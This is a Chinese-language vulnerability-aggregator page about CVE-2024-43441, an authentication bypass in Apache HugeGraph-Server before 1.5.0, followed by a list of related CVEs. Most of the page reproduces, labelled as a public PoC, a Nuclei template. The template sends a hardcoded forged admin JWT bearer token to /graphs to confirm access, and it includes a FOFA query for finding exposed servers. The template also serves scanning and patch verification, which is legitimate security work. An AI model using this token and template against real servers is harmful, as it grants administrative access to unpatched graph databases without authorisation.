CVE-2024-43441: Apache HugeGraph-Server <1.5.0 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Apache HugeGraph-Server | POC: 已公开

漏洞描述

Apache HugeGraph-Server versions prior to 1.5.0 contain an authentication bypass vulnerability caused by assumed-immutable data. This flaw allows attackers to bypass authentication mechanisms without requiring specific privileges or user interaction.

PoC代码[已公开]

id: CVE-2024-43441

info:
  name: Apache HugeGraph-Server <1.5.0 - Authentication Bypass
  author: wn147
  severity: critical
  description: |
    Apache HugeGraph-Server versions prior to 1.5.0 contain an authentication bypass vulnerability caused by assumed-immutable data. This flaw allows attackers to bypass authentication mechanisms without requiring specific privileges or user interaction.
  impact: |
    Attackers can bypass authentication, gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to Apache HugeGraph-Server version 1.5.0 or later.
  reference:
    - https://github.com/advisories/GHSA-f697-gm3h-xrf9
    - https://github.com/apache/incubator-hugegraph/commit/03b40a52446218c83e98cb43020e0593a744a246
    - https://lists.apache.org/thread/h2607yv32wgcrywov960jpxhvsmmlf12
    - http://www.openwall.com/lists/oss-security/2024/12/24/2
    - https://github.com/J1ezds/Vulnerability-Wiki-page
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43441
    cwe-id: CWE-302
    epss-score: 0.68776
    epss-percentile: 0.98583
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: hugegraph
    fofa-query: title="HugeGraph"
  tags: cve,cve2024,hugegraph,auth-bypass,apache

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /graphs HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 401'
          - 'contains_all(body,"jakarta.ws.rs.NotAuthorizedException", "Authentication credentials are required")'
        condition: and

  - raw:
      - |
        GET /graphs HTTP/1.1
        Host: {{Hostname}}
        Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX25hbWUiOiJhZG1pbiIsInVzZXJfaWQiOiItMzA6YWRtaW4iLCJleHAiOjIwNzE0NzY4MzB9.vb193qf4xpIPFcmCN8J0sRwqUaoS2RAUvFx9uLC-I7Q

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"graphs", "hugegraph")'
          - 'contains(header, "application/json")'
        condition: and
# digest: 490a00463044022059b1cd833ae8fb9bd95998f5c1f5cc52883d54f628179019196aee641944aa2502203591e44a8775464f9c7d29a8c837396dfdc0df8ae29ac1b8443ef3539f5f303a:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-43441.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2024-27348: Apache HugeGraph-Server - Remote Command Execution POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425） 无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833） 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC

Wordpress WooCommerce Ultimate Gift Card /wp-admin/admin-ajax.php mwb_wgm_preview_mail 文件上传漏洞（CVE-2024-8425）无POC

DataCube3 exec.php SQL 注入漏洞（CVE-2024-25833）无POC